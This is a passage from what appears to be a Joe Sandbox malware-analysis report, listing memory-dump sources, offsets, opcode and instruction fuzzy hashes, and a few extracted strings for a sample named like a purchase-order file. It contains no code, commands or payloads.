                                                          • Instruction ID: 8115b84772b0fa70d8b12792fc77a300fbf736c577d687d0f11b16aa955618ac
                                                          • Opcode Fuzzy Hash: bf2bdd8601c74f76081c2a28a9596e2a72d27e82dcfc6ef92c770297e9367187
                                                          • Instruction Fuzzy Hash: 77C08C300416088BE30877EAED0D7BD3768EB0230AF4448A2E50C028109FF9AC40CAFA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 638fb872c2bf1732f001aa8616538d5222ea4d9ee1d781e4b671315f6b702c68
                                                          • Instruction ID: 5bbe13e36370dee7ce9a83e2ab66aa1a08572c29aa2bbf182d5bceaac9b9bc3a
                                                          • Opcode Fuzzy Hash: 638fb872c2bf1732f001aa8616538d5222ea4d9ee1d781e4b671315f6b702c68
                                                          • Instruction Fuzzy Hash: BAD0C735904111CBD7189F16CC145D977A47F5974175A8465C74593110D734E9419BE1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ea4b05f3533b517d92c206af110aaa7338972842b277ab1553f8d1907a26d722
                                                          • Instruction ID: 9fac1b3ea14084d94f028c2a7bf02bb2871d51829a4259c44c3abdde3a6a0b3e
                                                          • Opcode Fuzzy Hash: ea4b05f3533b517d92c206af110aaa7338972842b277ab1553f8d1907a26d722
                                                          • Instruction Fuzzy Hash: 66C00276E5001A9A8B00DAD9E4508DCB774EB94321B004026D214A6104D63115268B50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                          • Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
                                                          • Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
                                                          • Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e434dfe1ef23d8a20e8aa111d295e98dd95eb522790554ed402885fd0e2b564c
                                                          • Instruction ID: e2e4b6448e85fb9cc1a3545a50e34b97494164ddfef2bf853430ff114c892aac
                                                          • Opcode Fuzzy Hash: e434dfe1ef23d8a20e8aa111d295e98dd95eb522790554ed402885fd0e2b564c
                                                          • Instruction Fuzzy Hash: 97C08C72210104CBF30CAB94D0A836E7A22D7C5355F00C05AA08223188CE782806CA63
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c7351ec274978caa2d820990f481ec468566ab0411fee50fb8b05b31efe91f93
                                                          • Instruction ID: 15e52a07a118d512d4d0b00e673bbf82138ea3350bdac8dee51c55ee73483973
                                                          • Opcode Fuzzy Hash: c7351ec274978caa2d820990f481ec468566ab0411fee50fb8b05b31efe91f93
                                                          • Instruction Fuzzy Hash: F0B09272000208EB86009B85E904D59BB69AB58700714C025E609061218B32A822DA94
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0fe0d9e3b3c16731e508b461e520e232a8b9c74d8545af92ca836ce0b8e68ad0
                                                          • Instruction ID: fa729a4d9e060fc6cf933e009c15d6958e299ad77ce7133f5ca19877b3b791ad
                                                          • Opcode Fuzzy Hash: 0fe0d9e3b3c16731e508b461e520e232a8b9c74d8545af92ca836ce0b8e68ad0
                                                          • Instruction Fuzzy Hash: 4FB09BE58045C187DF1157F05D2D34CA9F05FD4711F0FC596F062551C54D149043C5D1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8ad8cc968beb992bb59260550ac5801c980f8eacf6c182d01c35d5a97387dd59
                                                          • Instruction ID: ac98227c9d699c709fa0a67eb5a1c47df21b3329779c967dab9ca39f6926f6d8
                                                          • Opcode Fuzzy Hash: 8ad8cc968beb992bb59260550ac5801c980f8eacf6c182d01c35d5a97387dd59
                                                          • Instruction Fuzzy Hash: B190023105860C8B56402F957C09655775CA5456157940052A50D426115A5D64109696
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f08c9cd26e17818e2ba2544d79a40286acde7356731caf48dcabc804bec3b45b
                                                          • Instruction ID: 5e494712950ce3d218adf560323540e49c86ef9f14077da3092857cc6e5f6d1b
                                                          • Opcode Fuzzy Hash: f08c9cd26e17818e2ba2544d79a40286acde7356731caf48dcabc804bec3b45b
                                                          • Instruction Fuzzy Hash: 47B048708086148FE7548F998844758BAA0AB08300F1081A7A44EA2220E63449849F20
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "$2$7$C
                                                          • API String ID: 0-2463851005
                                                          • Opcode ID: 854e1ad863427f45cc1971c2cd96b0d256d22c3bf80eb76871ecaaa0399e2c2f
                                                          • Instruction ID: 5506e489943c6ab0c5b7ba1d27084de83cd748e353ccbcbe6658f57b407a8ab3
                                                          • Opcode Fuzzy Hash: 854e1ad863427f45cc1971c2cd96b0d256d22c3bf80eb76871ecaaa0399e2c2f
                                                          • Instruction Fuzzy Hash: A251C8B1E052188BEB29DF6AC84879EBBB6BF88304F14C5E9D409A7254DB705E818F51
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (bq$,bq
                                                          • API String ID: 0-1616511919
                                                          • Opcode ID: 2a23ce07f159c71f81f80b8ea361ff854180a44ea8d821239307ec43328b00e8
                                                          • Instruction ID: bdf1ef58ab97d6ffbbe65bc167aef48a7543030073392f6b5c4708d001c2a868
                                                          • Opcode Fuzzy Hash: 2a23ce07f159c71f81f80b8ea361ff854180a44ea8d821239307ec43328b00e8
                                                          • Instruction Fuzzy Hash: E9D1F975A006048FDB18DF68C585B69BBF6FF88320F6985A9E9059B361CB31ED81CB50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q$4'^q
                                                          • API String ID: 0-2697143702
                                                          • Opcode ID: 2340ad86043b90f59754f85b08e5c7910a906ab80b5217f7fe3b19c44d5bf38a
                                                          • Instruction ID: f5d819fe25b4d94216997e6c2d6cd989b3eb96b216c29b2175d47f5dfc2ec269
                                                          • Opcode Fuzzy Hash: 2340ad86043b90f59754f85b08e5c7910a906ab80b5217f7fe3b19c44d5bf38a
                                                          • Instruction Fuzzy Hash: 2B71EF71D006458FD75CDF7EE89069ABBF3FBC8300F14C52AE0089B265EBB859459B91
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q$4'^q
                                                          • API String ID: 0-2697143702
                                                          • Opcode ID: 8fa2f0adeca2cfab5149debc3e67b50ea32a7776524f35c02d88718cc5ee5fc5
                                                          • Instruction ID: 7e154512af26659c45ba812cb8f60812e4a95f6ae81417d6cf10bf8adb857aae
                                                          • Opcode Fuzzy Hash: 8fa2f0adeca2cfab5149debc3e67b50ea32a7776524f35c02d88718cc5ee5fc5
                                                          • Instruction Fuzzy Hash: E371DE71D006458FD75CDF7EE89069ABBF3FBC8300F18C52AE0089B265EBB859459B91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748768765.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, Offset: 05D00000, based on PE: true
                                                          • Associated: 00000000.00000002.1748918837.0000000005D50000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5d00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b8ef338a347d78b24a48a91f5c579d559d241ca399c22e27505efb135b2aab1a
                                                          • Instruction ID: 7b7cdaab4c1ea2a77401ed6328c41ab13b35db4b69440eec206a053f186549f5
                                                          • Opcode Fuzzy Hash: b8ef338a347d78b24a48a91f5c579d559d241ca399c22e27505efb135b2aab1a
                                                          • Instruction Fuzzy Hash: EAC2AC6240E3C25FD7138B749DB6AE17FB1EE6321471E15DBD0C18F0A3E218A95AC762
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "
                                                          • API String ID: 0-123907689
                                                          • Opcode ID: 44ed6d85f5c6b830bbe9daddafcbcd99f109167abbab03f1947326cc86e84e4a
                                                          • Instruction ID: ddaddce086ef7b7a7445321f1919c8837ec2e69036b2f33fd68e13a4a032eac3
                                                          • Opcode Fuzzy Hash: 44ed6d85f5c6b830bbe9daddafcbcd99f109167abbab03f1947326cc86e84e4a
                                                          • Instruction Fuzzy Hash: B1317F71E056598BEB1DCF6B894429EFAF7AFC9300F14C5FAD40CAA264DB304A818F11
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8f0109e9b9d6386acb45891304eb33bfe0cb56b0b5a274ad1c15fde502f76899
                                                          • Instruction ID: cfaa5f90deba45bb2be1a010d1fd1b8dc06ecb207396a66e0e0b0436ca79938d
                                                          • Opcode Fuzzy Hash: 8f0109e9b9d6386acb45891304eb33bfe0cb56b0b5a274ad1c15fde502f76899
                                                          • Instruction Fuzzy Hash: D212C371E046199BDB14CFAEC98069EFBF3BF88304F24C569D458AB219D734A986CF50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6a3b42d316005fe11dfaceb3dbe50a3f10ffd89c0769ebe203be4133097be7d3
                                                          • Instruction ID: 83d79c06e6aa333fc5af9bf023e20058a17f3c5b85af36fb64e9abdbd017a1d6
                                                          • Opcode Fuzzy Hash: 6a3b42d316005fe11dfaceb3dbe50a3f10ffd89c0769ebe203be4133097be7d3
                                                          • Instruction Fuzzy Hash: EEF1E474A04258CFDB68DF28D894BEABBB2FB89300F1081E9D549A7354DB346E81DF41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ce3cff00e3e8cf6498fd1a268a518b9bde4df86feeb973aa4f621923bb40efe9
                                                          • Instruction ID: 3e9b7074538e54227b3ae2fd868a3967d985c3594f5664d13ec24d9c25c6296a
                                                          • Opcode Fuzzy Hash: ce3cff00e3e8cf6498fd1a268a518b9bde4df86feeb973aa4f621923bb40efe9
                                                          • Instruction Fuzzy Hash: EEE10274A04258CFDB28DF68D894BEEBBB2EB89300F1081E9D449A7354DB746E85DF41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c7874181c00788082c39bf4c53651e59b25ebd0d52b77fe4461f1af39728ffa6
                                                          • Instruction ID: ceac2034e1ac25590d183012af1943b2422c9a6099cecbcae7ca0b5148df5783
                                                          • Opcode Fuzzy Hash: c7874181c00788082c39bf4c53651e59b25ebd0d52b77fe4461f1af39728ffa6
                                                          • Instruction Fuzzy Hash: 45C11474E04248CFDB58CFA9D894BADBBF6FB49300F1091A9E409AB294DB745985CF01
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 105bb40a2b94863e344003dccecccf2fd2ef7a8bb8afbb66437319362e1160e3
                                                          • Instruction ID: 2f759ae8fed681e3b7de4670af63ba3a298417e86b6cadbe2e66fb0462a07bd0
                                                          • Opcode Fuzzy Hash: 105bb40a2b94863e344003dccecccf2fd2ef7a8bb8afbb66437319362e1160e3
                                                          • Instruction Fuzzy Hash: 17C11470E04248CFDB58CFA9D894BEDBBF6FB49300F2091AAD409AB295DB745985CF01
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2c6012a2ab7bddbf9420c5657b3555134e4d29dc1cf9f5ce383c35213dc97b85
                                                          • Instruction ID: 35c831bf926ded21f26bdc43a667fd3a69c3b71feb1b89803ac2d0e2827c2b7d
                                                          • Opcode Fuzzy Hash: 2c6012a2ab7bddbf9420c5657b3555134e4d29dc1cf9f5ce383c35213dc97b85
                                                          • Instruction Fuzzy Hash: C2A10574D01218CFDB24CFA9D884BADBBF6FB49310F2091AAE409A7355DB74A985DF01
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b1d2ee917d28422aa0e8e594979c9bd4951cf37e8a367d1e9b0bb0db241e5f43
                                                          • Instruction ID: 7f8de8f38ffba21baa376b469acf0df18cc76dd5d73c6e1d9cfd22a3bc6ca72b
                                                          • Opcode Fuzzy Hash: b1d2ee917d28422aa0e8e594979c9bd4951cf37e8a367d1e9b0bb0db241e5f43
                                                          • Instruction Fuzzy Hash: 33A1D474D01618CFDB24CFA9D884BADBBF2FB49310F2091AAE409AB355D774A985DF01
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1730071720.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5bcc199695be83dc5968fc5be4e502958e4f3cb7fb37d2ea822fb5adf626c44b
                                                          • Instruction ID: 9386955462b1fba2cb9d83498daf8205282d86ca513765d3bf38e1d774d30c1c
                                                          • Opcode Fuzzy Hash: 5bcc199695be83dc5968fc5be4e502958e4f3cb7fb37d2ea822fb5adf626c44b
                                                          • Instruction Fuzzy Hash: 77816D31A00204CFD714DB48C484BAAB7F3EF94300F69C1A9D019AB659D775ED89CBB4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9a32d59e00a2e0ef58ccb474c4f97d1dbf22b906ef42b0e992c1406507612f87
                                                          • Instruction ID: 187dcc613e84b10e54311d29841122bcf5a1adeae6a3a09544bd9154b1d70dd6
                                                          • Opcode Fuzzy Hash: 9a32d59e00a2e0ef58ccb474c4f97d1dbf22b906ef42b0e992c1406507612f87
                                                          • Instruction Fuzzy Hash: 16812870E45208CFDB28DFA9D498BEEBBF6FB49300F1090A9E409A7255DB74A945DF04
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d26a51d1a9281164b726d469c67dfca658819955f7716ee74e787a1903fc1cac
                                                          • Instruction ID: 5334e7a6d79fbe6e4f517a06e8dc193065aadd107e49a4daa5bde7f8c269bfcf
                                                          • Opcode Fuzzy Hash: d26a51d1a9281164b726d469c67dfca658819955f7716ee74e787a1903fc1cac
                                                          • Instruction Fuzzy Hash: F9812970E05208CFDB28DFA9D498BEEB7F6FB49300F1090A9E409A7295DB74A945DF04
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d78b98c34a705680b05fe21777e01dafdb7fd4068e1c222d0e9f4976bfb907ec
                                                          • Instruction ID: 9215975e528294e500aac949cd6766f10738638f25778c32976f3f1cbf74d478
                                                          • Opcode Fuzzy Hash: d78b98c34a705680b05fe21777e01dafdb7fd4068e1c222d0e9f4976bfb907ec
                                                          • Instruction Fuzzy Hash: 23812B70E45248CFDB28DFA9D494BEEBBF2FB49300F1090A9E409A7255DB74A981DF04
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748974376.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e30000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 892a00b74aa70e7f21331ac9ed06affb379b22ff63bc7cd82e70e0ecad6004ec
                                                          • Instruction ID: 8343c0acbab56f505b2c934f6b855424495e700b15f14354b24974019814168b
                                                          • Opcode Fuzzy Hash: 892a00b74aa70e7f21331ac9ed06affb379b22ff63bc7cd82e70e0ecad6004ec
                                                          • Instruction Fuzzy Hash: 1E71C574E04218CFEB24DF65E944BEDBBF2BF49304F10A0A9D449A7251EB749985CF41
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3c92f81c9cd0da8087364071f3034dd8f11c109f7eec8e6138eb246ca5926a20
                                                          • Instruction ID: 38d8205b236a6467a7e76b2863d3bdde08c46c8457fa68bc8d6fcf5b0e676c25
                                                          • Opcode Fuzzy Hash: 3c92f81c9cd0da8087364071f3034dd8f11c109f7eec8e6138eb246ca5926a20
                                                          • Instruction Fuzzy Hash: 26515670D05208CFEB08CFA9D58A7EDBBF2FB89310F54906AE449A7294DB785945CF42
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7838052bcfc341bfce8d0263ff6fb8d7538dcb1e9f57533aeabefab23d791e06
                                                          • Instruction ID: 1cd5d37e55edd9ca31de0ddc18ec44199d10525caa89caba179352ce0cbce563
                                                          • Opcode Fuzzy Hash: 7838052bcfc341bfce8d0263ff6fb8d7538dcb1e9f57533aeabefab23d791e06
                                                          • Instruction Fuzzy Hash: 63515570D06208CFDB08CFA9D68A7EDBBF2FB89310F50906AE449A7294D7785945CF42
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 962587bf83b2f570f9b9293806ba931d1b6500e04b701ca3d894525058e22a94
                                                          • Instruction ID: 66ab0c08775238cf2d02e9395e42caf9ae4dd8536bf3a10365a22a73c2a4d25a
                                                          • Opcode Fuzzy Hash: 962587bf83b2f570f9b9293806ba931d1b6500e04b701ca3d894525058e22a94
                                                          • Instruction Fuzzy Hash: A051B670D45259CBEB28CFAAC8457EDBBF2BF88304F14C4AAC409A7255DB745985DF40
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748032705.00000000059E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59e0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c33b67a33242ad82f177aa8fcc2b274a1777b17276a34bd9c3aac15946c0665a
                                                          • Instruction ID: 7883cfd23dd75283f82b93ed90b7f5fe4f6ca871c752f3e064f584217f3bd1e4
                                                          • Opcode Fuzzy Hash: c33b67a33242ad82f177aa8fcc2b274a1777b17276a34bd9c3aac15946c0665a
                                                          • Instruction Fuzzy Hash: 234156B1E016189BEB08CFABC94069EFBF7BFC8310F14C06AD958AB214DB7459458F54
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1747879535.00000000059C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_59c0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 32f0063c257234c736f4e9c073ed98431adebea9b8bd382578ff63148588d640
                                                          • Instruction ID: 46b42c4c302cdb4593cb3f8dbae9fa71eccfcb1d5c6831378aa19f41cd7189f0
                                                          • Opcode Fuzzy Hash: 32f0063c257234c736f4e9c073ed98431adebea9b8bd382578ff63148588d640
                                                          • Instruction Fuzzy Hash: 0851C370E04258CFDB28CF6AD944BADBBF6BF89300F14C4AAD40AA7214DB745A85CF51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748463440.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b40000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3771a94d84aae6bf99c26f55b5ca7d6729ce9fbcd67271772696d3c5b3de1de4
                                                          • Instruction ID: dfeebfa22972fde5c1181b0e0c2a27c8c0a3d3eab211d760c0a894969404a81d
                                                          • Opcode Fuzzy Hash: 3771a94d84aae6bf99c26f55b5ca7d6729ce9fbcd67271772696d3c5b3de1de4
                                                          • Instruction Fuzzy Hash: 9F51E670D05259CBEB28CFAAC8457EEBBF2AF88300F18C4AAC409A7255DB745985DF40
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1748526387.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5b50000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: de8a6493495ea935541b4278f5dda6908dcd2c6841c205e900af1a505c98ba62
                                                          • Instruction ID: 1d49555442fef14e44ed11cf230fed552d4d9695e1463d6ebc2f9a1464b6e2d9
